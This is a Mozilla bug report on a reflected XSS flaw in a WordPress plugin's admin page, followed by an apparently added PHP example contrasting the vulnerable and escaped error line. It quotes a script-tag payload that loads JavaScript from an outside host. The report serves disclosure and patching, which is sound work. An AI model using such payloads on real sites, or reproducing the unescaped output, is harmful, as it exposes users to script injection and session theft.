Closed Bug 770300 Opened 12 years ago Closed 12 years ago

"Duplicate Post" WP Plugin - Fix XSS Before Adding to Air Mozilla Blog

Categories

(Infrastructure & Operations Graveyard :: WebOps: Other, task)

x86
macOS
task
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: mfuller, Assigned: dmaher)

References

Details

(Keywords: wsec-xss)

Bug 748584 requests that we add the "Duplicate Post" plugin to the Air Mozilla WordPress instance. During the security review, an XSS vulnerability was discovered. Before we can install the plugin, this code must be patched.

The issue occurs in the page: duplicate-post-admin.php.

The parameter, $id, is saved using $_GET['post']. A URL may look like: site.com/wp-admin/admin.php?action=duplicate_post_save_as_new_post&post=1 where '1' is the post to copy. However, if '1' doesn't exist, an error message is displayed, echoing '1' out without properly escaping.

This allows the code: <SCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js><%2FSCRIPT> as a parameter of 'post' to create XSS.

To fix this issue, use htmlspecialchars on the output of $id in the following line:
wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
I sent the developer of the plug-in a link to this bug.
I also emailed the developer the day I found the bug and he replied saying he would provide an update. If this is not an urgent install for the blog owner, we can go ahead and wait for his update. If it is urgent, the fix involves adding one function around one line of code after the plugin is installed. Either way, let me know and I'll re-review it once it's updated.

Thanks,
Matt
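As an added illustration of the fix described in the bug report (this is example code, not the plugin's own file or Mozilla's patch), the snippet below places the unescaped error line beside the patched one. The WordPress helpers `__()`, `esc_attr()` and `wp_die()` are replaced by minimal stand-ins so the file runs from the PHP CLI, and the `$_GET['post']` value is a constructed sample, not a real request. The integer-cast variant at the end goes beyond the page's fix and is an assumption about what a post ID should look like.

```php
<?php
// Added example, not code from the Duplicate Post plugin or from this bug's patch.
// Minimal stand-ins for the WordPress functions used on the affected line
// (assumption: the real WordPress core provides these).
if (!defined('DUPLICATE_POST_I18N_DOMAIN')) {
    define('DUPLICATE_POST_I18N_DOMAIN', 'duplicate-post');
}
function __($text, $domain = 'default') { return $text; }               // no translation here
function esc_attr($text) { return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); }
function wp_die($message) { echo $message, "\n"; }                       // print instead of exiting

// Constructed input: what PHP places in $_GET['post'] after URL-decoding a
// request of the kind described in the bug (host is a placeholder).
$_GET['post'] = '<SCRIPT SRC=http://example.invalid/xss.js></SCRIPT>';

// Vulnerable form (the line named in the bug): the translated prefix is
// escaped, but $id is concatenated raw, so any markup in it is rendered.
function vulnerable_error($id) {
    wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
}

// Patched form as the report prescribes: htmlspecialchars on $id.
// ENT_QUOTES also converts both quote characters, so the value stays inert
// inside attribute values as well as in element text.
function patched_error($id) {
    wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . htmlspecialchars($id, ENT_QUOTES, 'UTF-8'));
}

// Stricter variant (assumption, beyond the page's fix): post IDs are integers,
// so casting first discards any non-numeric payload before it is echoed.
function strict_error($id) {
    $id = (int) $id;
    wp_die(esc_attr(__('Copy creation failed, could not find original:', DUPLICATE_POST_I18N_DOMAIN)) . ' ' . $id);
}

$id = $_GET['post'];
vulnerable_error($id);   // script tags reach the response unchanged
patched_error($id);      // angle brackets become &lt; and &gt;
strict_error($id);       // non-numeric input collapses to 0
```

Run with `php example.php` and compare the three output lines. In a real WordPress plugin, `esc_html($id)` is the idiomatic equivalent of the `htmlspecialchars()` call, since it applies the same entity encoding through WordPress's own escaping layer.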
Blocks: 775120
Assigning to WebOps to patch locally for deployment.
Assignee: nobody → server-ops-webops
Component: air.mozilla.com → Server Operations: Web Operations
Product: Websites → mozilla.org
QA Contact: cshields
Version: Firefox 6 → other
:zandr both -dev and -stage are now running the new reboot code for air.m.o, which is not wordpress based. on the production nodes, there is no duplicate post plugin, as expected. 

is there something specific you're looking for us (webops) to complete for you on this?
Assignee: server-ops-webops → dmaher
:cturra so the request is that webops implement the plugin in prod, but instead of running the vanilla code, we patch it as indicated in comment #1.  My plan is to pull the plugin repo as normal, create a local branch, modify the code, and roll with that.

:richard has confirmed that the prod site is EOL right now anyways, so we don't need to worry about long-term support.
Since creating local-only branches is not possible in svn, I instead simply downloaded the plugin tarball, decompressed it to the correct location, and patched it as necessary.  I also added a README.duplicate-post documenting the change.  I realise that this is a one-off, but this version of AirMo is EOL, so we don't need to worry about long-term support for this plugin.

I have confirmed with :richard that the plugin is operational.  Closing bug.
Status: NEW → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
Thanks for your work on this!
Adding keywords to bugs for metrics, no action required.  Sorry about bugmail spam.
Keywords: wsec-xss
Component: Server Operations: Web Operations → WebOps: Other
Product: mozilla.org → Infrastructure & Operations
Product: Infrastructure & Operations → Infrastructure & Operations Graveyard